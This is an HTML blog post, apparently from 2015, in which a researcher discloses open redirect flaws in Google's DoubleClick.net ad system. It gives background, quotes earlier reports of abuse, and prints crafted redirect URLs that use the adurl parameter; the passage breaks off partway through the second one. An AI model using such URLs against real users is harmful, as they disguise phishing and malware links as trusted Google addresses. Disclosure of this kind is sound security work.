<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://tetraph.wordpress.com/2014/12/28/yahoo-open-redirect/">https://tetraph.wordpress.com/2014/12/28/yahoo-open-redirect/</a><br /><a href="http://itinfotech.tumblr.com/post/118511508076/securitypost-yahoo-and-yahoo-japan-may-be">http://itinfotech.tumblr.com/post/118511508076/securitypost-yahooyahoo-japan-may-be</a><br /><a href="https://computerpitch.wordpress.com/2015/01/27/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/">https://computerpitch.wordpress.com/2015/01/27/yahoo-vulnerable-to-spams/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://testingcode.lofter.com/post/1cd26eb9_73096b9"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://testingcode.lofter.com/post/1cd26eb9_73096b9</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://lifegrey.tumblr.com/post/120767572004/yahoo-url-redirection-bug"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lifegrey.tumblr.com/post/120767572004/yahoo-url-redirection-bug</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://blog.163.com/greensun_2006/blog/static/1112211220155565419870/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://blog.163.com/greensun_2006/blog/static/1112211220155565419870/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://aibiyi.blogspot.com/2015/06/yahoo-open-redirect.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://aibiyi.blogspot.com/2015/06/yahoo-open-redirect.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.facebook.com/tetraph/posts/1659455054274454"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/tetraph/posts/1659455054274454</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/yahoo-and-yahoo-japan-may-be-vulnerable-to-spams/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/yahoo-to-spams/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/spamming/yahoo-url-redirection/">http://www.tetraph.com/blog/spamming/yahoo-url-redirection/</a></span></div>
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-51076288026671652302015-06-05T01:25:00.000-07:002015-06-05T01:35:57.326-07:00Google DoubleClick Website System Could be Used by Spammers<div class="">
<div class="im">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5B7UfI5X73RhQsdKVGa5LdpniYa8L4-MvWDpJYHhWUIWJ2Max2UwwR7Zy8zjJ4hGUBVC3S4OMbWd99773mj6FBpvK0w85r9-IVv2v6QWLx27q5Ic1yTpS8QinEBR5VOqvXXu_88gD1wke/s1600/google_1558926c.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5B7UfI5X73RhQsdKVGa5LdpniYa8L4-MvWDpJYHhWUIWJ2Max2UwwR7Zy8zjJ4hGUBVC3S4OMbWd99773mj6FBpvK0w85r9-IVv2v6QWLx27q5Ic1yTpS8QinEBR5VOqvXXu_88gD1wke/s400/google_1558926c.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<br /></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Google DoubleClick.net (Advertising) System URL Redirection Vulnerabilities Could Be Used by Spammers</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><br /></span></span></div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Although
Google does not include Open Redirect vulnerabilities in its bug bounty
program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">However, Google might have overlooked the security of its DoubleClick.net <wbr></wbr>advertising
system. After some test, it is found that most of the redirection URLs
within DoubleClick.net are vulnerable to Open Redirect vulnerabilities.
Many redirection are likely to be affected. </span>This could allow a
user to create a specially crafted URL, that if clicked, would redirect a
victim from the intended legitimate web site to an arbitrary web site
of the attacker's choosing. Such attacks are useful as the crafted URL
initially appear to be a web page of a trusted site. This could be
leveraged to direct an unsuspecting user to a web page containing
attacks that target client side software such as a web browser or
document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These redirections can be easily used by spammers, too.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">
</span>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belong to Googleads.g.Doubleclick.net</span><wbr></wbr><span style="font-size: small;"> are
vulnerable to Open Redirect attacks, too. While Google prevents similar
URL redirections other than Googleads.g.Doubleclick.<wbr></wbr>net. Attackers can use URLs related to Google Account to make the attacks more powerful.</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Moreover,
these vulnerabilities can be used to attack other companies such as
Google, eBay, The New York Times, Amazon, Godaddy, Yahoo, Netease, e.g.
by bypassing their Open Redirect filters (Covert Redirect).</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Discover and Reporter:</span></div>
</div>
<div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><span style="line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/534330655891419136">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></span><a href="http://www.tetraph.com/wangjing/" style="line-height: 28px; text-align: justify;"><br />http://www.tetraph.com/<wbr></wbr>wangjing/</a></span></div>
</div>
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1) Background Related to Google DoubleClick.net.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.1) What is DoubleClick.net?</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">"</span><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick
is a subsidiary of Google which develops and provides Internet ad
serving services. Its clients include agencies, marketers (Universal
McCann, AKQA etc.) and publishers who serve customers like Microsoft,
General Motors, Coca-Cola, Motorola, L'Oréal, Palm, Inc., Apple Inc.,
Visa USA, Nike, Carlsberg among others. DoubleClick's headquarters is in
New York City, United States.</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">DoubleClick
was founded in 1996 by Kevin O'Connor and Dwight Merriman. It was
formerly listed as "DCLK" on the NASDAQ, and was purchased by private
equity firms Hellman & Friedman and JMI Equity in July 2005. In
March 2008, Google acquired DoubleClick for US$3.1 billion. Unlike many
other dot-com companies, it survived the dot-com bubble and focuses on
uploading ads and reporting their performance.</span><span style="font-family: Arial, Helvetica, sans-serif; font-size: small;">" (Wikipedia)</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2) Reports Related to Google DoubleClick.net Used by Spammers</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.1)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Google DoublClick.net has been used by spammers for long time. The following is a report in 2008.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"The
open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain."</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.virusbtn.com/blog/2008/06_03a.xml?comments" style="background-color: white;" target="_blank">https://www.virusbtn.com/blog/<wbr></wbr>2008/06_03a.xml?comments</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.2)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Mitechmate published a blog related to DoubleClick.net spams in 2014.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"<a href="http://ad.doubleclick.net/" target="_blank">Ad.doubleclick.net</a> is
recognized as a perilous adware application that causes unwanted
redirections when surfing on the certain webpages. Actually it is
another browser hijacker that aims to distribute frauds to make
money.Commonly people pick up Ad.doubleclick virus when download
softwares, browse porn site or read spam email attachments. It enters
into computer sneakily after using computer insecurely.Ad.<wbr></wbr>doubleclick.net is
not just annoying, this malware traces users’ personal information,
which would be utilized for cyber criminal."</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/" style="background-color: white;" target="_blank">http://blog.mitechmate.com/<wbr></wbr>remove-ad-doubleclick-net-<wbr></wbr>redirect-virus/</a></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(1.2.3)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Malwarebytes posted a news related to DoubleClick.net malvertising in 2014.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">"Large malvertising campaign under way involving DoubleClick and Zedo"</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/" style="background-color: white;" target="_blank">https://blog.malwarebytes.org/<wbr></wbr>malvertising-2/2014/09/large-<wbr></wbr>malvertising-campaign-under-<wbr></wbr>way-involving-doubleclick-and-<wbr></wbr>zedo/</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2) DoubleClick.net System URL Redirection Vulnerabilities Details.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;">The
vulnerabilities can be attacked without user login. Tests were
performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla
Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064
(64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span></span></div>
<div style="margin: 0px;">
<span style="background-color: white;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Used webpages for the following tests. The webpage address is "</span><a href="http://securitypost.tumblr.com/">http://securitypost.tumblr.com/</a>". We can suppose that this webpage is malicious.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net<wbr></wbr>.</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">(2.1.1)</b></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;">Some URLs belong to googleads.g.doubleclick.net</span><wbr></wbr><span style="font-size: small;"> are vulnerable to Open Redirect attacks. While Google prevents similar URL redirection other than googleads.g.doubleclick.<wbr></wbr>net.</span></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Vulnerable URLs:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo" style="background-color: white;" target="_blank">http://googleads.g.<wbr></wbr>doubleclick.net/aclk?sa=L&ai=<wbr></wbr>CWEQH6Q73UqW9CMvMigfdiIGoB9rlk<wbr></wbr>sIEAAAQASAAUO7kr-b8_____<wbr></wbr>wFgvwWCARdjYS1wdWItMDQ2NjU4MjE<wbr></wbr>wOTU2NjUzMsgBBOACAKgDAaoEggFP0<wbr></wbr>E-9agyjXkIfjOxmtpPE76hNCBn1in_<wbr></wbr>meKMn53O-<wbr></wbr>8ZFlbxWDgYdaVZQKJza8mIRXw22hWI<wbr></wbr>VMAOJJzq-S6AipWHe9iVZCAAlcHj-<wbr></wbr>gT2B33tD9a2oQrZ61S3-WFh_<wbr></wbr>8T8RFUFnC_PRC35CTFbueQrUYjC-<wbr></wbr>j6ncVXzt_IPXugo5vE-3x4AQBoAYV&<wbr></wbr>num=0&sig=AOD64_<wbr></wbr>2petJH0A9Zjj45GN117ocBukiroA&<wbr></wbr>client=ca-pub-<wbr></wbr>0466582109566532&adurl=http://<wbr></wbr>www.sharp-world.com/igzo</a></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com" style="background-color: white;" 